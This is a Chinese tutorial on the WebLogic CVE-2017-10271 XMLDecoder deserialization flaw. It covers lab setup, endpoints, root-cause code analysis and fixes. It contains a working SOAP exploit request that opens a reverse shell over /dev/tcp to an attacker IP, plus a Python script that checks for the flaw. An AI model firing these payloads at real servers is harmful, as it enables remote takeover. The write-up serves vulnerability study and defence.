weblogic漏洞分析之CVE-2017-10271
字数 1407 2025-08-05 00:15:46

WebLogic漏洞分析之CVE-2017-10271教学文档

一、漏洞概述

CVE-2017-10271是Oracle WebLogic Server WLS组件中的一个远程命令执行漏洞,攻击者可以通过构造特殊的SOAP(XML)格式请求,在服务器上执行任意命令。该漏洞主要影响WebLogic 10.3.6.0.0、12.1.3.0.0、12.2.1.1.0和12.2.1.2.0版本。

二、环境搭建

1. Docker环境配置

使用vulhub的CVE-2017-10271环境:

  1. 编辑docker-compose.yml文件,添加8453端口用于调试:
version: '2'
services:
  weblogic:
    image: vulhub/weblogic:10.3.6.0-2017
    ports:
      - "7001:7001"
      - "8453:8453"
  1. 启动Docker容器:
docker-compose up -d
  1. 进入容器配置WebLogic远程调试:
cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
vi setDomainEnv.sh

在setDomainEnv.sh中添加以下两行代码:

debugFlag="true"
export debugFlag
  1. 打包并导出modules和wlserver_10.3文件夹

2. IDEA配置

  1. 将wlserver_10.3文件夹放入项目中
  2. 配置远程调试
  3. 导入wlserver_10.3\server\lib下的jar包和modules的所有文件
  4. 设置断点后访问漏洞页面触发调试:
http://192.168.202.129:7001/wls-wsat/CoordinatorPortType

三、漏洞复现

1. 漏洞检测

访问以下URL之一,若显示相应页面则可能存在漏洞:

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

2. 使用Burp Suite验证

发送POST请求时需指定:

Content-Type: text/xml

否则会报415错误。

3. 反弹Shell POC

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.149.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1148

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
      <java version="1.4.0" class="java.beans.XMLDecoder">
        <void class="java.lang.ProcessBuilder">
          <array class="java.lang.String" length="3">
            <void index="0">
              <string>/bin/bash</string>
            </void>
            <void index="1">
              <string>-c</string>
            </void>
            <void index="2">
              <string>bash -i >& /dev/tcp/192.168.149.138/4444 0>&1</string>
            </void>
          </array>
          <void method="start"/>
        </void>
      </java>
    </work:WorkContext>
  </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>

4. Python验证脚本

#!/usr/bin/env python
# coding:utf-8
import requests
from sys import argv

headers = {
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'text/xml'
}

def Webogic_XMLDecoder_poc(url):
    posturl = url + '/wls-wsat/CoordinatorPortType'
    data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
      <soapenv:Header>
        <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
          <java version="1.6.0" class="java.beans.XMLDecoder">
            <object class="java.io.PrintWriter">
              <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string>
              <void method="println">
                <string>xmldecoder_vul_test</string>
              </void>
              <void method="close"/>
            </object>
          </java>
        </work:WorkContext>
      </soapenv:Header>
      <soapenv:Body/>
    </soapenv:Envelope>
    '''
    print url
    try:
        r = requests.post(posturl, data=data, headers=headers, timeout=5)
        geturl = url + "/wls-wsat/test.txt"
        check_result = requests.get(geturl, headers=headers, timeout=5)
        if 'xmldecoder_vul_test' in check_result.text:
            print u"存在WebLogic WLS远程执行漏洞(CVE-2017-10271)"
    except:
        pass

if __name__ == '__main__':
    if len(argv) == 1:
        print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"
        exit(0)
    else:
        url = argv[1]
        Webogic_XMLDecoder_poc(url)

四、漏洞分析

1. 漏洞触发流程

  1. 攻击者向/wls-wsat/CoordinatorPortType发送精心构造的SOAP请求
  2. WebLogic的WLS组件接收并处理SOAP格式的请求
  3. 请求中的XML数据被解析并反序列化
  4. 最终执行xmlDecoder.readObject触发漏洞

2. 关键代码分析

漏洞主要发生在weblogic/wsee/jaxws/workcontext/WorkContextServerTube类的processRequest方法中:

  1. processRequest方法处理POST数据包中的XML数据
  2. 调用readHeaderOld方法处理读取的XML
  3. 使用ByteArrayOutputStream将XML转换为字节流
  4. 将字节流传入WorkContextXmlInputAdapter
  5. WorkContextXmlInputAdapter内部使用XMLDecoder进行反序列化
  6. 最终调用xmlDecoder.readObject执行恶意代码

3. 漏洞本质

该漏洞的本质是WebLogic中的WLS组件在接收到SOAP格式的请求后:

  1. 未对解析XML后的类和参数进行充分验证
  2. 允许攻击者通过XMLDecoder反序列化执行任意Java代码
  3. 特别是可以调用ProcessBuilder.start()等方法执行系统命令

五、修复建议

  1. 升级到Oracle官方发布的最新补丁
  2. 临时解决方案:删除或重命名wls-wsat.war文件
  3. 配置网络防火墙,限制对WebLogic管理端口的访问
  4. 启用WebLogic的安全配置,限制XML反序列化操作

六、总结

CVE-2017-10271是一个典型的XML反序列化漏洞,攻击者可以通过构造特殊的SOAP请求在WebLogic服务器上执行任意命令。理解该漏洞的触发机制和利用方式对于WebLogic服务器的安全防护具有重要意义。

WebLogic漏洞分析之CVE-2017-10271教学文档 一、漏洞概述 CVE-2017-10271是Oracle WebLogic Server WLS组件中的一个远程命令执行漏洞,攻击者可以通过构造特殊的SOAP(XML)格式请求,在服务器上执行任意命令。该漏洞主要影响WebLogic 10.3.6.0.0、12.1.3.0.0、12.2.1.1.0和12.2.1.2.0版本。 二、环境搭建 1. Docker环境配置 使用vulhub的CVE-2017-10271环境: 编辑docker-compose.yml文件,添加8453端口用于调试: 启动Docker容器: 进入容器配置WebLogic远程调试: 在setDomainEnv.sh中添加以下两行代码: 打包并导出modules和wlserver_ 10.3文件夹 2. IDEA配置 将wlserver_ 10.3文件夹放入项目中 配置远程调试 导入wlserver_ 10.3\server\lib下的jar包和modules的所有文件 设置断点后访问漏洞页面触发调试: 三、漏洞复现 1. 漏洞检测 访问以下URL之一,若显示相应页面则可能存在漏洞: 2. 使用Burp Suite验证 发送POST请求时需指定: 否则会报415错误。 3. 反弹Shell POC 4. Python验证脚本 四、漏洞分析 1. 漏洞触发流程 攻击者向 /wls-wsat/CoordinatorPortType 发送精心构造的SOAP请求 WebLogic的WLS组件接收并处理SOAP格式的请求 请求中的XML数据被解析并反序列化 最终执行 xmlDecoder.readObject 触发漏洞 2. 关键代码分析 漏洞主要发生在 weblogic/wsee/jaxws/workcontext/WorkContextServerTube 类的 processRequest 方法中: processRequest 方法处理POST数据包中的XML数据 调用 readHeaderOld 方法处理读取的XML 使用 ByteArrayOutputStream 将XML转换为字节流 将字节流传入 WorkContextXmlInputAdapter WorkContextXmlInputAdapter 内部使用 XMLDecoder 进行反序列化 最终调用 xmlDecoder.readObject 执行恶意代码 3. 漏洞本质 该漏洞的本质是WebLogic中的WLS组件在接收到SOAP格式的请求后: 未对解析XML后的类和参数进行充分验证 允许攻击者通过XMLDecoder反序列化执行任意Java代码 特别是可以调用 ProcessBuilder.start() 等方法执行系统命令 五、修复建议 升级到Oracle官方发布的最新补丁 临时解决方案:删除或重命名wls-wsat.war文件 配置网络防火墙,限制对WebLogic管理端口的访问 启用WebLogic的安全配置,限制XML反序列化操作 六、总结 CVE-2017-10271是一个典型的XML反序列化漏洞,攻击者可以通过构造特殊的SOAP请求在WebLogic服务器上执行任意命令。理解该漏洞的触发机制和利用方式对于WebLogic服务器的安全防护具有重要意义。